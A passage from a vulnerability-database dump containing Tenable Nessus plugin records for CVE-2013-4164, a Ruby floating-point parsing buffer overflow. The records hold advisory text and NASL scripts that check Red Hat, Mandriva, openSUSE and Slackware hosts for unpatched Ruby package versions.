"bulletinFamily": "scanner", "cvelist": ["CVE-2013-4164"], "modified": "2013-11-26T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:ruby", "p-cpe:/a:redhat:enterprise_linux:ruby-debuginfo", "cpe:/o:redhat:enterprise_linux:6.5", "p-cpe:/a:redhat:enterprise_linux:ruby-rdoc", "p-cpe:/a:redhat:enterprise_linux:ruby-irb", "p-cpe:/a:redhat:enterprise_linux:ruby-static", "p-cpe:/a:redhat:enterprise_linux:ruby-docs", "p-cpe:/a:redhat:enterprise_linux:ruby-ri", "p-cpe:/a:redhat:enterprise_linux:ruby-libs", "p-cpe:/a:redhat:enterprise_linux:ruby-devel", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:ruby-tcltk"], "id": "REDHAT-RHSA-2013-1764.NASL", "href": "https://www.tenable.com/plugins/nessus/71093", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:1764. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(71093);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-4164\");\n script_bugtraq_id(63873);\n script_xref(name:\"RHSA\", value:\"2013:1764\");\n\n script_name(english:\"RHEL 6 : ruby (RHSA-2013:1764)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated ruby packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nRuby is an extensible, interpreted, object-oriented, scripting\nlanguage. It has features to process text files and to perform system\nmanagement tasks.\n\nA buffer overflow flaw was found in the way Ruby parsed floating point\nnumbers from their text representation. If an application using Ruby\naccepted untrusted input strings and converted them to floating point\nnumbers, an attacker able to provide such input could cause the\napplication to crash or, possibly, execute arbitrary code with the\nprivileges of the application. (CVE-2013-4164)\n\nAll ruby users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2013:1764\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-4164\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-rdoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-ri\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-tcltk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/11/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/11/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/11/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2013:1764\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"ruby-1.8.7.352-13.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"ruby-1.8.7.352-13.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"ruby-1.8.7.352-13.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"ruby-debuginfo-1.8.7.352-13.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"ruby-devel-1.8.7.352-13.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"ruby-docs-1.8.7.352-13.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"ruby-docs-1.8.7.352-13.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"ruby-docs-1.8.7.352-13.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"ruby-irb-1.8.7.352-13.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"ruby-irb-1.8.7.352-13.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"ruby-irb-1.8.7.352-13.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"ruby-libs-1.8.7.352-13.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"ruby-rdoc-1.8.7.352-13.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"ruby-rdoc-1.8.7.352-13.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"ruby-rdoc-1.8.7.352-13.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"ruby-ri-1.8.7.352-13.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"ruby-ri-1.8.7.352-13.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"ruby-ri-1.8.7.352-13.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"ruby-static-1.8.7.352-13.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"ruby-static-1.8.7.352-13.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"ruby-static-1.8.7.352-13.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"ruby-tcltk-1.8.7.352-13.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"ruby-tcltk-1.8.7.352-13.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"ruby-tcltk-1.8.7.352-13.el6\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby / ruby-debuginfo / ruby-devel / ruby-docs / ruby-irb / etc\");\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T11:54:26", "description": "A vulnerability was found and corrected in ruby :\n\nHeap-based buffer overflow in Ruby 1.8, 1.9 before 1.9.3-p484, 2.0\nbefore 2.0.0-p353, 2.1 before 2.1.0 preview2, and trunk before\nrevision 43780 allows context-dependent attackers to cause a denial of\nservice (segmentation fault) and possibly execute arbitrary code via a\nstring that is converted to a floating point value, as demonstrated\nusing (1) the to_f method or (2) JSON.parse (CVE-2013-4164).\n\nThe updated packages have been patched to correct these issues.", "edition": 24, "published": "2013-11-27T00:00:00", "title": "Mandriva Linux Security Advisory : ruby (MDVSA-2013:286)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4164"], "modified": "2013-11-27T00:00:00", "cpe": ["cpe:/o:mandriva:business_server:1", "p-cpe:/a:mandriva:linux:ruby", "p-cpe:/a:mandriva:linux:ruby-doc", "p-cpe:/a:mandriva:linux:ruby-tk", "p-cpe:/a:mandriva:linux:ruby-devel"], "id": "MANDRIVA_MDVSA-2013-286.NASL", "href": "https://www.tenable.com/plugins/nessus/71100", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2013:286. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(71100);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-4164\");\n script_bugtraq_id(63873);\n script_xref(name:\"MDVSA\", value:\"2013:286\");\n\n script_name(english:\"Mandriva Linux Security Advisory : ruby (MDVSA-2013:286)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability was found and corrected in ruby :\n\nHeap-based buffer overflow in Ruby 1.8, 1.9 before 1.9.3-p484, 2.0\nbefore 2.0.0-p353, 2.1 before 2.1.0 preview2, and trunk before\nrevision 43780 allows context-dependent attackers to cause a denial of\nservice (segmentation fault) and possibly execute arbitrary code via a\nstring that is converted to a floating point value, as demonstrated\nusing (1) the to_f method or (2) JSON.parse (CVE-2013-4164).\n\nThe updated packages have been patched to correct these issues.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:ruby-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:ruby-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:ruby-tk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/11/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/11/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"ruby-1.8.7.p358-2.3.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"ruby-devel-1.8.7.p358-2.3.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"ruby-doc-1.8.7.p358-2.3.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"ruby-tk-1.8.7.p358-2.3.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T12:27:09", "description": "The following security issue was fixed in ruby19 :", "edition": 17, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : ruby19 (openSUSE-SU-2013:1835-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4164"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:ruby19-debugsource", "p-cpe:/a:novell:opensuse:ruby19-debuginfo", "p-cpe:/a:novell:opensuse:ruby19-devel", "p-cpe:/a:novell:opensuse:ruby19-tk-debuginfo", "cpe:/o:novell:opensuse:12.3", "p-cpe:/a:novell:opensuse:ruby19-tk", "p-cpe:/a:novell:opensuse:ruby19", "p-cpe:/a:novell:opensuse:ruby19-doc-ri", "p-cpe:/a:novell:opensuse:ruby19-devel-extra", "cpe:/o:novell:opensuse:13.1", "cpe:/o:novell:opensuse:12.2"], "id": "OPENSUSE-2013-940.NASL", "href": "https://www.tenable.com/plugins/nessus/75221", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2013-940.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75221);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2013-4164\");\n script_bugtraq_id(63873);\n\n script_name(english:\"openSUSE Security Update : ruby19 (openSUSE-SU-2013:1835-1)\");\n script_summary(english:\"Check for the openSUSE-2013-940 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\"The following security issue was fixed in ruby19 :\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=851803\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2013-12/msg00028.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ruby19 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby19\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby19-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby19-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby19-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby19-devel-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby19-doc-ri\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby19-tk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby19-tk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/11/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.2|SUSE12\\.3|SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.2 / 12.3 / 13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.2\", reference:\"ruby19-1.9.3.p392-3.34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"ruby19-debuginfo-1.9.3.p392-3.34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"ruby19-debugsource-1.9.3.p392-3.34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"ruby19-devel-1.9.3.p392-3.34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"ruby19-devel-extra-1.9.3.p392-3.34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"ruby19-doc-ri-1.9.3.p392-3.34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"ruby19-tk-1.9.3.p392-3.34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"ruby19-tk-debuginfo-1.9.3.p392-3.34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"ruby19-1.9.3.p392-1.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"ruby19-debuginfo-1.9.3.p392-1.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"ruby19-debugsource-1.9.3.p392-1.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"ruby19-devel-1.9.3.p392-1.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"ruby19-devel-extra-1.9.3.p392-1.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"ruby19-doc-ri-1.9.3.p392-1.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"ruby19-tk-1.9.3.p392-1.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"ruby19-tk-debuginfo-1.9.3.p392-1.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ruby19-1.9.3.p448-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ruby19-debuginfo-1.9.3.p448-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ruby19-debugsource-1.9.3.p448-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ruby19-devel-1.9.3.p448-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ruby19-devel-extra-1.9.3.p448-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ruby19-doc-ri-1.9.3.p448-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ruby19-tk-1.9.3.p448-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ruby19-tk-debuginfo-1.9.3.p448-2.4.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby19 / ruby19-debuginfo / ruby19-debugsource / ruby19-devel / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T09:10:41", "description": "New ruby packages are available for Slackware 13.1, 13.37, 14.0,\n14.1, and -current to fix a security issue.", "edition": 23, "published": "2013-12-17T00:00:00", "title": "Slackware 13.1 / 13.37 / 14.0 / 14.1 / current : ruby (SSA:2013-350-06)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4164"], "modified": "2013-12-17T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:14.1", "cpe:/o:slackware:slackware_linux:13.37", "cpe:/o:slackware:slackware_linux:14.0", "cpe:/o:slackware:slackware_linux", "p-cpe:/a:slackware:slackware_linux:ruby", "cpe:/o:slackware:slackware_linux:13.1"], "id": "SLACKWARE_SSA_2013-350-06.NASL", "href": "https://www.tenable.com/plugins/nessus/71472", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2013-350-06. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(71472);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-4164\");\n script_bugtraq_id(63873);\n script_xref(name:\"SSA\", value:\"2013-350-06\");\n\n script_name(english:\"Slackware 13.1 / 13.37 / 14.0 / 14.1 / current : ruby (SSA:2013-350-06)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New ruby packages are available for Slackware 13.1, 13.37, 14.0,\n14.1, and -current to fix a security issue.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2013&m=slackware-security.484609\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ba213c49\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected ruby package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/12/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/12/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"13.1\", pkgname:\"ruby\", pkgver:\"1.9.3_p484\", pkgarch:\"i486\", pkgnum:\"1_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"ruby\", pkgver:\"1.9.3_p484\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.1\")) flag++;\n\nif (slackware_check(osver:\"13.37\", pkgname:\"ruby\", pkgver:\"1.9.3_p484\", pkgarch:\"i486\", pkgnum:\"1_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"ruby\", pkgver:\"1.9.3_p484\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.37\")) flag++;\n\nif (slackware_check(osver:\"14.0\", pkgname:\"ruby\", 